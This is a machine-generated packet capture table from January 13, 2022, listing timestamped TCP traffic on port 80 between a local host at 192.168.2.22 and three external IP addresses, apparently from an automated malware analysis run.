                                                  Jan 13, 2022 20:21:56.503830910 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.503835917 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.503880978 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.503896952 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.503927946 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.503932953 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.503983021 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.504029989 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.504034996 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.504050970 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.504090071 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.504092932 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.504139900 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.504149914 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.504174948 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.504199028 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.504260063 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.504276991 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.504321098 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.504323006 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.504379034 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.504380941 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.504431009 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.504440069 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.504487038 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.504537106 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.504568100 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.504587889 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.504590034 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.504647970 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.504704952 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.504708052 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.504713058 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.504718065 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.504766941 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.504821062 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.504827023 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.504846096 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.504885912 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.504885912 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.504945993 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.504950047 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.505008936 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.505009890 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.505069017 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.505105972 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.505129099 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.505131006 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.505183935 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.505186081 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.505243063 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.505244017 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.505305052 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.505306005 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.505366087 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.505367041 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.505425930 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.505440950 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.505486012 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.505487919 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.505543947 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.505578041 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.505585909 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.505601883 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.505661964 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.505666018 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.505718946 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.505723000 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.505779028 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.505794048 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.505836964 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.505880117 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.505908012 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.505928040 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.505992889 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.506009102 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.506052017 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.506078005 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.506109953 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.506141901 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.506166935 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.506169081 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.506227016 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.506282091 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.506289005 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.506315947 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.506336927 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.506357908 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.506390095 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.506411076 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.506441116 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.506481886 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.506529093 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.506532907 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.506553888 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.506580114 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.506588936 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.506637096 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.506659985 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.506680965 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.506686926 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.506737947 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.506747007 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.506787062 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.506789923 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.506838083 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.506850004 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.506891966 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.506901026 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.506943941 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.506961107 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.506998062 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.507009029 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.507049084 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.507062912 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.507101059 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.507121086 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.507153988 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.507169962 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.507206917 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.507213116 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.507260084 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.507268906 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.507317066 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.507325888 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.507381916 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.513681889 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.513689995 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.513725042 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.513752937 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.513772964 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.513780117 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.513804913 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.513830900 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.517132998 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.517159939 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.517177105 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.517194033 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.517210007 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.517227888 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.517250061 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.517282009 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.526878119 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.528120041 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.614736080 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.614794016 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.614836931 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.614845037 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.614871979 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.614902973 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.614908934 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.614955902 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.614962101 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.615015984 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.615017891 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.615075111 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.615077019 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.615134954 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.615134954 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.615195036 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.615195990 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.615256071 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.615258932 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.615315914 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.615334988 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.615374088 CET8049167198.23.213.59192.168.2.22
Jan 13, 2022 20:21:56.615376949 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.615432978 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.615432978 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.615489960 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.615489960 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.615547895 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.615549088 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.615607023 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.615608931 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.615667105 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.615667105 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.615727901 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.615730047 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.615786076 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.615799904 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.615844011 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.615844965 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.615901947 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.615915060 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.615958929 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.615961075 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.616015911 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.616017103 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.616075039 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.616142988 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.616166115 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.616193056 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.616199970 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.616203070 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.616259098 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.616266966 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.616319895 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.616322041 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.616381884 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.617614031 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.617669106 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.617716074 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.617731094 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.617768049 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.617769003 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.617786884 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.617825031 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.619472980 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.621841908 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.621936083 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.621982098 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.621989965 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.622010946 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.622035980 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.622042894 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.622098923 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.622107983 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.622154951 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.622164965 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.622210026 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.622226000 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.622265100 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.622282982 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.622328043 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.622328043 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.622384071 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.622391939 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.622438908 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.622446060 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.622493029 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.622500896 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.622545958 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.622553110 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.622603893 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.622608900 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.622662067 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.622669935 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.622720957 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.622725964 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.622780085 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.622833967 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.622836113 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.622848988 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.622895002 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.622900009 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.622951984 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.622992992 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.623009920 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.623014927 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.623070002 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.623071909 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.623126030 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.623143911 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.623183012 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.623198032 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.623241901 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.623254061 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.623303890 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.623327971 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.623357058 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.623363018 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.623410940 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.623430967 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.623444080 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.623472929 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.623478889 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.623500109 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.623507023 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.623528957 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.623529911 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.623562098 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.623567104 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.623588085 CET | 80 | 49167 | 198.23.213.59 | 192.168.2.22
Jan 13, 2022 20:21:56.623625994 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.623635054 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.623641968 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:56.628263950 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:21:57.584275007 CET | 49167 | 80 | 192.168.2.22 | 198.23.213.59
Jan 13, 2022 20:22:49.518750906 CET | 49168 | 80 | 192.168.2.22 | 103.224.212.220
Jan 13, 2022 20:22:49.686537027 CET | 80 | 49168 | 103.224.212.220 | 192.168.2.22
Jan 13, 2022 20:22:49.687244892 CET | 49168 | 80 | 192.168.2.22 | 103.224.212.220
Jan 13, 2022 20:22:49.687273026 CET | 49168 | 80 | 192.168.2.22 | 103.224.212.220
Jan 13, 2022 20:22:49.874944925 CET | 80 | 49168 | 103.224.212.220 | 192.168.2.22
Jan 13, 2022 20:22:49.875169039 CET | 49168 | 80 | 192.168.2.22 | 103.224.212.220
Jan 13, 2022 20:22:49.875209093 CET | 49168 | 80 | 192.168.2.22 | 103.224.212.220
Jan 13, 2022 20:22:50.042529106 CET | 80 | 49168 | 103.224.212.220 | 192.168.2.22
Jan 13, 2022 20:22:54.914364100 CET | 49169 | 80 | 192.168.2.22 | 195.211.74.112
Jan 13, 2022 20:22:54.941133976 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:54.941236973 CET | 49169 | 80 | 192.168.2.22 | 195.211.74.112
Jan 13, 2022 20:22:54.941361904 CET | 49169 | 80 | 192.168.2.22 | 195.211.74.112
Jan 13, 2022 20:22:54.967983007 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:54.977261066 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:54.977288008 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:54.977300882 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:54.977313995 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:54.977329969 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:54.977346897 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:54.977365971 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:54.977382898 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:54.977427006 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:54.977443933 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:54.977463961 CET | 49169 | 80 | 192.168.2.22 | 195.211.74.112
Jan 13, 2022 20:22:54.977493048 CET | 49169 | 80 | 192.168.2.22 | 195.211.74.112
Jan 13, 2022 20:22:55.004143953 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:55.004168987 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:55.004185915 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:55.004203081 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:55.004220963 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:55.004236937 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:55.004252911 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:55.004270077 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:55.004275084 CET | 49169 | 80 | 192.168.2.22 | 195.211.74.112
Jan 13, 2022 20:22:55.004287004 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
Jan 13, 2022 20:22:55.004297972 CET | 49169 | 80 | 192.168.2.22 | 195.211.74.112
Jan 13, 2022 20:22:55.004307032 CET | 80 | 49169 | 195.211.74.112 | 192.168.2.22
